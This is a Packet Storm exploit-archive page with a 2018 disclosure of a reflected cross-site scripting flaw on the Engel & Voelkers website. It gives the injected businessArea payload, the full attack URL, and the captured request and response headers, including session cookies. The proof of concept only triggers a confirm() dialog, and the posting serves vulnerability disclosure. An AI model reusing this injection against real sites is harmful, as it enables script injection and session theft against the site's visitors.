what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Engel Voelkers Cross Site Scripting

Engel Voelkers Cross Site Scripting
Posted May 28, 2018
Authored by Ismail Tasdelen

www.engelvoelkers.com suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | ca63dd8900bc530bb28fd2119fb867c60f4e129331a7b454bbec9119b07f1f5d

Engel Voelkers Cross Site Scripting

Change Mirror Download
# Exploit Title: [ Reflected XSS at Engel Voelkers ]

# Date: [27.05.2018]

# Exploit Author: [Ismail Tasdelen]

# Vendor Homepage: [https://www.engelvoelkers.com/]

# Software Link: [ Engel Voelkers Website ]

# Version: 1.0

# Tested on: Kali Linux

# Reflected XSS Payload : residential'-confirm(/Ismail Tasdelen/)-'

# HTTP REQUEST HEADER :

Request URL: https://www.engelvoelkers.com/en/search/?businessArea=residential%27-confirm%28%2FIsmail%20Tasdelen%2F%29-%27&srch=search-text&q=&facets=cntry%3A%3B
Request Method: GET
Status Code: 200
Remote Address: 130.211.26.108:443
Referrer Policy: no-referrer-when-downgrade
:authority: www.engelvoelkers.com
:method: GET
:path: /en/search/?businessArea=residential%27-confirm%28%2FIsmail%20Tasdelen%2F%29-%27&srch=search-text&q=&facets=cntry%3A%3B
:scheme: https
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
accept-encoding: gzip, deflate, br
accept-language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
cache-control: max-age=0
cookie: nbu=4b33b1ea-61d0-11e8-96d5-42010a103302; signature=4da87ca2e51b5650fefa58627a5b8e70a10bf0425369cef6cb90534ea2c768be; verify=NGIzM2IxZWEtNjFkMC0xMWU4LTk2ZDUtNDIwMTBhMTAzMzAyOyUyZmVuJTJmc2VhcmNoJTJmJTNmYnVzaW5lc3NBcmVhJTNkcmVzaWRlbnRpYWwlMjUyNy1jb25maXJtJTI1MjglMjUyRklzbWFpbCUyNTIwVGFzZGVsZW4lMjUyRiUyNTI5LSUyNTI3JTI2c3JjaCUzZHNlYXJjaC10ZXh0JTI2cSUzZCUyNmZhY2V0cyUzZGNudHJ5JTI1M0ElMjUzQjtTdW4sIDI3IE1heSAyMDE4IDE3OjA2OjI3IEdNVA==; _ga=GA1.2.744261947.1527435138; _gid=GA1.2.959267156.1527435138; nbu=06e7d858-dec2-4d6f-ad04-b67e05551ffd; engelundvoelkersconfig=TRY-sqm.m-false-TR-tr; _icl_current_language=en; evlocale=en_TR; BIGipServergroup-rz-webfe-prod=235738028.20480.0000; _gat_ev_com=1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Mobile Safari/537.36

# HTTP RESPONSE HEADER :

accept-ranges: bytes
age: 0
alt-svc: clear
cache-control: max-age=0, proxy-revalidate, no-cache, no-store, must-revalidate, private
content-encoding: gzip
content-language: en-TR
content-type: text/html;charset=utf-8
date: Sun, 27 May 2018 17:07:33 GMT
ev-revision: ce7e759467f9281d7107826ce514d214b3f4cb0a
ev-version: P-12.4.1-FRONTEND
expires: 0
expires: Tue, 01 Jan 1980 1:00:00 GMT
pragma: no-cache
server: Apache
set-cookie: engelundvoelkersconfig=TRY-sqm.m-false-TR-tr; Path=/
set-cookie: _icl_current_language=en; Path=/
set-cookie: evlocale=en_TR; Path=/
set-cookie: evlocale=en_TR; Path=/
status: 200
vary: X-MCS-LB-Info-S,Accept-Encoding
via: 1.1 google

# Query String Parametres :

businessArea: residential'-confirm(/Ismail Tasdelen/)-'
srch: search-text
q:
facets: cntry:;

# You want to follow my activity ?

https://www.linkedin.com/in/ismailtasdelen
https://github.com/ismailtasdelen
https://twitter.com/ismailtsdln
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close